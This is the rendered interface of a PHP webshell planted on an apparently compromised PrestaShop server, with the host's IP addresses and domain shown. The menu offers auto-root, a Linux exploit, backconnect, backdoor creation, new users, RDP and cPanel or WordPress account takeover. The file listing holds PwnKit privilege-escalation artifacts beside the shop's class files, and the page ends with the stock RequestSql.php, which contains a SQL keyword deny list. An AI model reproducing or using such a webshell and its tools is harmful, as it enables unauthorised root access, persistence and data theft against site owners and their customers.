Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 18.117.135.132
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
addify5 /
.trash /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Smarty
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
checkout
[ DIR ]
drwxr-xr-x
container
[ DIR ]
drwxr-xr-x
controller
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
exception
[ DIR ]
drwxr-xr-x
form
[ DIR ]
drwxr-xr-x
helper
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
log
[ DIR ]
drwxr-xr-x
module
[ DIR ]
drwxr-xr-x
order
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
product
[ DIR ]
drwxr-xr-x
proxy
[ DIR ]
drwxr-xr-x
range
[ DIR ]
drwxr-xr-x
shop
[ DIR ]
drwxr-xr-x
stock
[ DIR ]
drwxr-xr-x
tax
[ DIR ]
drwxr-xr-x
tree
[ DIR ]
drwxr-xr-x
webservice
[ DIR ]
drwxr-xr-x
.htaccess
170
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
Access.php
13.25
KB
-rw-r--r--
Address.php
21.03
KB
-rw-r--r--
AddressChecksumCore.php
1.81
KB
-rw-r--r--
AddressFormat.php
24.54
KB
-rw-r--r--
Alias.php
4.99
KB
-rw-r--r--
Attachment.php
11.27
KB
-rw-r--r--
AttributeGroup.php
13.17
KB
-rw-r--r--
CMS.php
11.45
KB
-rw-r--r--
CMSCategory.php
23.56
KB
-rw-r--r--
CMSRole.php
1.78
KB
-rw-r--r--
CSV.php
3.04
KB
-rw-r--r--
Carrier.php
63.97
KB
-rw-r--r--
Cart.php
211.83
KB
-rw-r--r--
CartRule.php
89.84
KB
-rw-r--r--
Category.php
87
KB
-rw-r--r--
Chart.php
4.08
KB
-rw-r--r--
ChecksumInterface.php
1.22
KB
-rw-r--r--
Combination.php
17.59
KB
-rw-r--r--
Configuration.php
26.5
KB
-rw-r--r--
ConfigurationKPI.php
8.91
KB
-rw-r--r--
ConfigurationTest.php
12.02
KB
-rw-r--r--
Connection.php
10.02
KB
-rw-r--r--
ConnectionsSource.php
4.81
KB
-rw-r--r--
Contact.php
3.83
KB
-rw-r--r--
Context.php
17.94
KB
-rw-r--r--
Cookie.php
17.39
KB
-rw-r--r--
Country.php
16.33
KB
-rw-r--r--
Currency.php
36.3
KB
-rw-r--r--
Curve.php
2.92
KB
-rw-r--r--
Customer.php
52.22
KB
-rw-r--r--
CustomerAddress.php
1.26
KB
-rw-r--r--
CustomerMessage.php
5.75
KB
-rw-r--r--
CustomerSession.php
2.65
KB
-rw-r--r--
CustomerThread.php
9.62
KB
-rw-r--r--
Customization.php
13.43
KB
-rw-r--r--
CustomizationField.php
2.85
KB
-rw-r--r--
DateRange.php
2.47
KB
-rw-r--r--
Delivery.php
3.24
KB
-rw-r--r--
Dispatcher.php
46.94
KB
-rw-r--r--
Employee.php
23.5
KB
-rw-r--r--
EmployeeSession.php
2.65
KB
-rw-r--r--
Feature.php
11.38
KB
-rw-r--r--
FeatureFlag.php
3.15
KB
-rw-r--r--
FeatureValue.php
8.06
KB
-rw-r--r--
FileUploader.php
3.73
KB
-rw-r--r--
Gender.php
2.81
KB
-rw-r--r--
Group.php
14.96
KB
-rw-r--r--
GroupReduction.php
8.81
KB
-rw-r--r--
Guest.php
8.31
KB
-rw-r--r--
Hook.php
46.57
KB
-rw-r--r--
Image.php
31.24
KB
-rw-r--r--
ImageManager.php
31.79
KB
-rw-r--r--
ImageType.php
6.99
KB
-rw-r--r--
Language.php
62.06
KB
-rw-r--r--
Link.php
61.05
KB
-rw-r--r--
LocalizationPack.php
23.05
KB
-rw-r--r--
Mail.php
33.49
KB
-rw-r--r--
Manufacturer.php
21.2
KB
-rw-r--r--
ManufacturerAddress.php
1.28
KB
-rw-r--r--
Media.php
31.43
KB
-rw-r--r--
Message.php
6.47
KB
-rw-r--r--
Meta.php
18.21
KB
-rw-r--r--
Notification.php
8.27
KB
-rw-r--r--
ObjectModel.php
81.56
KB
-rw-r--r--
Pack.php
24.63
KB
-rw-r--r--
Page.php
4.49
KB
-rw-r--r--
PaymentFree.php
1.33
KB
-rw-r--r--
PaymentModule.php
59.49
KB
-rw-r--r--
PhpEncryption.php
3.21
KB
-rw-r--r--
PhpEncryptionEngine.php
3.86
KB
-rw-r--r--
PrestaShopAutoload.php
9.57
KB
-rw-r--r--
PrestaShopBackup.php
11.91
KB
-rw-r--r--
PrestaShopCollection.php
21.28
KB
-rw-r--r--
PrestaShopLogger.php
8.3
KB
-rw-r--r--
Product.php
309.01
KB
-rw-r--r--
ProductAssembler.php
6.73
KB
-rw-r--r--
ProductAttribute.php
13.48
KB
-rw-r--r--
ProductDownload.php
10.05
KB
-rw-r--r--
ProductPresenterFactory.php
3.89
KB
-rw-r--r--
ProductSale.php
12.7
KB
-rw-r--r--
ProductSupplier.php
8.34
KB
-rw-r--r--
Profile.php
8.32
KB
-rw-r--r--
QqUploadedFileForm.php
5.19
KB
-rw-r--r--
QqUploadedFileXhr.php
5.69
KB
-rw-r--r--
QuickAccess.php
6.25
KB
-rw-r--r--
RequestSql.php
20.93
KB
-rw-r--r--
Risk.php
2.36
KB
-rw-r--r--
Search.php
51.86
KB
-rw-r--r--
SearchEngine.php
2.81
KB
-rw-r--r--
SpecificPrice.php
32.43
KB
-rw-r--r--
SpecificPriceRule.php
14.04
KB
-rw-r--r--
State.php
7.77
KB
-rw-r--r--
Store.php
6.24
KB
-rw-r--r--
Supplier.php
17.89
KB
-rw-r--r--
SupplierAddress.php
1.27
KB
-rw-r--r--
Tab.php
21.7
KB
-rw-r--r--
Tag.php
13.24
KB
-rw-r--r--
Tools.php
136.37
KB
-rw-r--r--
Translate.php
11.78
KB
-rw-r--r--
TranslatedConfiguration.php
4.68
KB
-rw-r--r--
Upgrader.php
11.58
KB
-rw-r--r--
Uploader.php
10.84
KB
-rw-r--r--
Validate.php
38.87
KB
-rw-r--r--
ValidateConstraintTranslator.p...
2.55
KB
-rw-r--r--
WarehouseAddress.php
1.27
KB
-rw-r--r--
Zone.php
3.42
KB
-rw-r--r--
index.php
1.34
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RequestSql.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ /** * Class RequestSqlCore. */ class RequestSqlCore extends ObjectModel { public $name; public $sql; /** * @see ObjectModel::$definition */ public static $definition = [ 'table' => 'request_sql', 'primary' => 'id_request_sql', 'fields' => [ 'name' => ['type' => self::TYPE_STRING, 'validate' => 'isString', 'required' => true, 'size' => 200], 'sql' => ['type' => self::TYPE_SQL, 'validate' => 'isString', 'required' => true], ], ]; /** @var array : List of params to tested */ public $tested = [ 'required' => ['SELECT', 'FROM'], 'option' => ['WHERE', 'ORDER', 'LIMIT', 'HAVING', 'GROUP', 'UNION'], 'operator' => [ 'AND', '&&', 'BETWEEN', 'AND', 'BINARY', '&', '~', '|', '^', 'CASE', 'WHEN', 'END', 'DIV', '/', '<=>', '=', '>=', '>', 'IS', 'NOT', 'NULL', '<<', '<=', '<', 'LIKE', '-', '%', '!=', '<>', 'REGEXP', '!', '||', 'OR', '+', '>>', 'RLIKE', 'SOUNDS', '*', '-', 'XOR', 'IN', ], 'function' => [ 'AVG', 'SUM', 'COUNT', 'MIN', 'MAX', 'STDDEV', 'STDDEV_SAMP', 'STDDEV_POP', 'VARIANCE', 'VAR_SAMP', 'VAR_POP', 'GROUP_CONCAT', 'BIT_AND', 'BIT_OR', 'BIT_XOR', ], 'unauthorized' => [ 'DELETE', 'ALTER', 'INSERT', 'REPLACE', 'CREATE', 'TRUNCATE', 'OPTIMIZE', 'GRANT', 'REVOKE', 'SHOW', 'HANDLER', 'LOAD', 'LOAD_FILE', 'ROLLBACK', 'SAVEPOINT', 'UNLOCK', 'INSTALL', 'UNINSTALL', 'ANALZYE', 'BACKUP', 'CHECK', 'CHECKSUM', 'REPAIR', 'RESTORE', 'CACHE', 'DESCRIBE', 'EXPLAIN', 'USE', 'HELP', 'SET', 'DUPLICATE', 'VALUES', 'INTO', 'RENAME', 'CALL', 'PROCEDURE', 'FUNCTION', 'DATABASE', 'SERVER', 'LOGFILE', 'DEFINER', 'RETURNS', 'EVENT', 'TABLESPACE', 'VIEW', 'TRIGGER', 'DATA', 'DO', 'PASSWORD', 'USER', 'PLUGIN', 'FLUSH', 'KILL', 'RESET', 'START', 'STOP', 'PURGE', 'EXECUTE', 'PREPARE', 'DEALLOCATE', 'LOCK', 'USING', 'DROP', 'FOR', 'UPDATE', 'BEGIN', 'BY', 'ALL', 'SHARE', 'MODE', 'TO', 'KEY', 'DISTINCTROW', 'DISTINCT', 'HIGH_PRIORITY', 'LOW_PRIORITY', 'DELAYED', 'IGNORE', 'FORCE', 'STRAIGHT_JOIN', 'SQL_SMALL_RESULT', 'SQL_BIG_RESULT', 'QUICK', 'SQL_BUFFER_RESULT', 'SQL_CACHE', 'SQL_NO_CACHE', 'SQL_CALC_FOUND_ROWS', 'WITH', 'OUTFILE', 'DUMPFILE', ], ]; public $attributes = [ 'passwd' => '*******************', 'secure_key' => '*******************', ]; /** @var array : list of errors */ public $error_sql = []; /** * Get list of request SQL. * * @return array|bool */ public static function getRequestSql() { if (!$result = Db::getInstance(_PS_USE_SQL_SLAVE_)->executeS('SELECT * FROM `' . _DB_PREFIX_ . 'request_sql` ORDER BY `id_request_sql`')) { return false; } $requestSql = []; foreach ($result as $row) { $requestSql[] = $row['sql']; } return $requestSql; } /** * Get list of request SQL by id request. * * @param int $id * * @return array */ public static function getRequestSqlById($id) { return Db::getInstance()->executeS('SELECT `sql` FROM `' . _DB_PREFIX_ . 'request_sql` WHERE `id_request_sql` = ' . (int) $id); } /** * Call the parserSQL() method in Tools class * Cut the request in table for check it. * * @param string $sql * * @return array|bool */ public function parsingSql($sql) { return Tools::parserSQL($sql); } /** * Check if the parsing of the SQL request is good or not. * * @param array $tab * @param bool $in * @param string $sql * * @return bool */ public function validateParser($tab, $in, $sql) { if (!$tab) { return false; } elseif (isset($tab['UNION'])) { $union = $tab['UNION']; foreach ($union as $tab) { if (!$this->validateSql($tab, $in, $sql)) { return false; } } return true; } else { return $this->validateSql($tab, $in, $sql); } } /** * Cut the request for check each cutting. * * @param array<string, array> $tab * @param bool $in * @param string $sql * * @return bool */ public function validateSql($tab, $in, $sql) { if (!$this->testedRequired($tab)) { return false; } elseif (!$this->testedUnauthorized($tab)) { return false; } elseif (!$this->checkedFrom($tab['FROM'])) { return false; } elseif (!$this->checkedSelect($tab['SELECT'], $tab['FROM'], $in)) { return false; } elseif (isset($tab['WHERE'])) { if (!$this->checkedWhere($tab['WHERE'], $tab['FROM'], $sql)) { return false; } } elseif (isset($tab['HAVING'])) { if (!$this->checkedHaving($tab['HAVING'], $tab['FROM'])) { return false; } } elseif (isset($tab['ORDER'])) { if (!$this->checkedOrder($tab['ORDER'], $tab['FROM'])) { return false; } } elseif (isset($tab['GROUP'])) { if (!$this->checkedGroupBy($tab['GROUP'], $tab['FROM'])) { return false; } } elseif (isset($tab['LIMIT'])) { if (!$this->checkedLimit($tab['LIMIT'])) { return false; } } if (empty($this->_errors) && !Db::getInstance()->executeS($sql)) { return false; } return true; } /** * Get list of all tables. * * @return array */ public function getTables() { $results = Db::getInstance()->executeS('SHOW TABLES'); $tables = []; foreach ($results as $result) { $key = array_keys($result); $tables[] = $result[$key[0]]; } return $tables; } /** * Get list of all attributes by an table. * * @param string $table * * @return array */ public function getAttributesByTable($table) { return Db::getInstance()->executeS('DESCRIBE ' . pSQL($table)); } /** * Cut an join sentence. * * @param array $attrs * @param array $from * * @return array */ public function cutJoin($attrs, $from) { $tab = []; foreach ($attrs as $attr) { if (in_array($attr['expr_type'], ['operator', 'const'])) { continue; } if (!empty($attr['sub_tree'])) { foreach ($attr['sub_tree'] as $treeItem) { if ($treeItem['expr_type'] !== 'colref') { continue; } if ($attribut = $this->cutAttribute($treeItem['base_expr'], $from)) { $tab[] = $attribut; } } } else { if ($attribut = $this->cutAttribute($attr['base_expr'], $from)) { $tab[] = $attribut; } } } return $tab; } /** * Cut an attribute with or without the alias. * * @param string $attr * @param array $from * * @return array|bool */ public function cutAttribute($attr, $from) { $matches = []; if (preg_match('/((`(\()?([a-z0-9_])+`(\))?)|((\()?([a-z0-9_])+(\))?))\.((`(\()?([a-z0-9_])+`(\))?)|((\()?([a-z0-9_])+(\))?))$/i', $attr, $matches, PREG_OFFSET_CAPTURE)) { $tab = explode('.', str_replace(['`', '(', ')'], '', $matches[0][0])); if ($table = $this->returnNameTable($tab[0], $from)) { return [ 'table' => $table, 'alias' => $tab[0], 'attribut' => $tab[1], 'string' => $attr, ]; } } elseif (preg_match('/((`(\()?([a-z0-9_])+`(\))?)|((\()?([a-z0-9_])+(\))?))$/i', $attr, $matches, PREG_OFFSET_CAPTURE)) { $attribut = str_replace(['`', '(', ')'], '', $matches[0][0]); if ($table = $this->returnNameTable(false, $from, $attr)) { return [ 'table' => $table, 'attribut' => $attribut, 'string' => $attr, ]; } } return false; } /** * Get name of table by alias. * * @param string|false $alias * @param array $tables * * @return array|bool */ public function returnNameTable($alias, $tables, $attr = null) { if ($alias) { foreach ($tables as $table) { if (!isset($table['alias']) || !isset($table['table'])) { continue; } /** @var string|array{'parts': array<int, bool>} $tableAlias */ $tableAlias = $table['alias']['no_quotes']; if ($tableAlias == $alias || $tableAlias['parts'][0] == $alias) { return [$table['table']]; } } } elseif (count($tables) > 1) { if ($attr !== null) { $tab = []; foreach ($tables as $table) { if ($this->attributExistInTable($attr, $table['table'])) { $tab = $table['table']; } } if (count($tab) == 1) { return $tab; } } $this->error_sql['returnNameTable'] = false; return false; } $tab = []; foreach ($tables as $table) { $tab[] = $table['table']; } return $tab; } /** * Check if an attributes exists in a table. * * @param string $attr * @param array $table * * @return bool */ public function attributExistInTable($attr, $table) { if (!$attr) { return true; } if (is_array($table) && (count($table) == 1)) { $table = $table[0]; } $attributs = $this->getAttributesByTable($table); foreach ($attributs as $attribut) { if ($attribut['Field'] == trim($attr, ' `')) { return true; } } return false; } /** * Check if all required sentence existing. * * @param array $tab * * @return bool */ public function testedRequired($tab) { foreach ($this->tested['required'] as $key) { if (!array_key_exists($key, $tab)) { $this->error_sql['testedRequired'] = $key; return false; } } return true; } /** * Check if an unauthorized existing in an array. * * @param array $tab * * @return bool */ public function testedUnauthorized($tab) { foreach ($this->tested['unauthorized'] as $key) { if (array_key_exists($key, $tab)) { $this->error_sql['testedUnauthorized'] = $key; return false; } } return true; } /** * Check a "FROM" sentence. * * @param array<int, array<string, mixed>> $from * * @return bool */ public function checkedFrom($from) { $nb = count($from); for ($i = 0; $i < $nb; ++$i) { $table = $from[$i]; if (isset($table['table']) && !in_array(str_replace('`', '', $table['table']), $this->getTables())) { $this->error_sql['checkedFrom']['table'] = $table['table']; return false; } if ($table['ref_type'] == 'ON' && (trim($table['join_type']) == 'LEFT' || trim($table['join_type']) == 'JOIN')) { $attrs = $this->cutJoin($table['ref_clause'], $from); foreach ($attrs as $attr) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedFrom']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } } } return true; } /** * Check a "SELECT" sentence. * * @param array<int, array<string, mixed>> $select * @param array $from * @param bool $in * * @return bool */ public function checkedSelect($select, $from, $in = false) { $nb = count($select); for ($i = 0; $i < $nb; ++$i) { $attribut = $select[$i]; if ($attribut['base_expr'] != '*' && !preg_match('/\.\*$/', $attribut['base_expr'])) { if ($attribut['expr_type'] == 'colref') { if ($attr = $this->cutAttribute(trim($attribut['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedSelect']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedSelect'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedSelect'] = false; return false; } } } while (is_array($attribut['sub_tree'])) { if ($attribut['expr_type'] === 'function' && in_array(strtoupper($attribut['base_expr']), $this->tested['unauthorized'])) { $this->error_sql['checkedSelect']['function'] = $attribut['base_expr']; return false; } $attribut = $attribut['sub_tree'][0]; } } elseif ($in) { $this->error_sql['checkedSelect']['*'] = false; return false; } } return true; } /** * Check a "WHERE" sentence. * * @param array<int, array<string, mixed>> $where * @param array $from * @param string $sql * * @return bool */ public function checkedWhere($where, $from, $sql) { $nb = count($where); for ($i = 0; $i < $nb; ++$i) { $attribut = $where[$i]; if ($attribut['expr_type'] == 'colref') { if ($attr = $this->cutAttribute(trim($attribut['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedWhere']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { $this->error_sql['checkedWhere'] = $this->error_sql['returnNameTable'] ?? false; return false; } } elseif ($attribut['expr_type'] == 'reserved') { if ($attribut['base_expr'] !== 'EXISTS' || !isset($where[$i + 1]) || $where[$i + 1]['expr_type'] !== 'subquery') { $this->error_sql['checkedWhere'] = $this->error_sql['returnNameTable'] ?? false; return false; } } elseif ($attribut['expr_type'] == 'operator') { if (!in_array(strtoupper($attribut['base_expr']), $this->tested['operator'])) { $this->error_sql['checkedWhere']['operator'] = [$attribut['base_expr']]; return false; } } elseif ($attribut['expr_type'] == 'subquery') { $tab = $attribut['sub_tree']; return $this->validateParser($tab, true, $sql); } } return true; } /** * Check a "HAVING" sentence. * * @param array<int, array<string, mixed>> $having * @param array $from * * @return bool */ public function checkedHaving($having, $from) { $nb = count($having); for ($i = 0; $i < $nb; ++$i) { $attribut = $having[$i]; if ($attribut['expr_type'] == 'colref') { if ($attr = $this->cutAttribute(trim($attribut['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedHaving']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedHaving'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedHaving'] = false; return false; } } } if ($attribut['expr_type'] == 'operator') { if (!in_array(strtoupper($attribut['base_expr']), $this->tested['operator'])) { $this->error_sql['checkedHaving']['operator'] = [$attribut['base_expr']]; return false; } } } return true; } /** * Check a "ORDER" sentence. * * @param array $order * @param array $from * * @return bool */ public function checkedOrder($order, $from) { $order = $order[0]; if (array_key_exists('expression', $order) && $order['type'] == 'expression') { if ($attr = $this->cutAttribute(trim($order['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedOrder']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedOrder'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedOrder'] = false; return false; } } } return true; } /** * Check a "GROUP BY" sentence. * * @param array $group * @param array $from * * @return bool */ public function checkedGroupBy($group, $from) { $group = $group[0]; if ($group['expr_type'] == 'colref') { if ($attr = $this->cutAttribute(trim($group['base_expr']), $from)) { if (!$this->attributExistInTable($attr['attribut'], $attr['table'])) { $this->error_sql['checkedGroupBy']['attribut'] = [$attr['attribut'], implode(', ', $attr['table'])]; return false; } } else { if (isset($this->error_sql['returnNameTable'])) { $this->error_sql['checkedGroupBy'] = $this->error_sql['returnNameTable']; return false; } else { $this->error_sql['checkedGroupBy'] = false; return false; } } } return true; } /** * Check a "LIMIT" sentence. * * @param array $limit * * @return bool */ public function checkedLimit($limit) { if (!preg_match('#^[0-9]+$#', trim($limit['offset'])) || !preg_match('#^[0-9]+$#', trim($limit['rowcount']))) { $this->error_sql['checkedLimit'] = false; return false; } return true; } }
Close
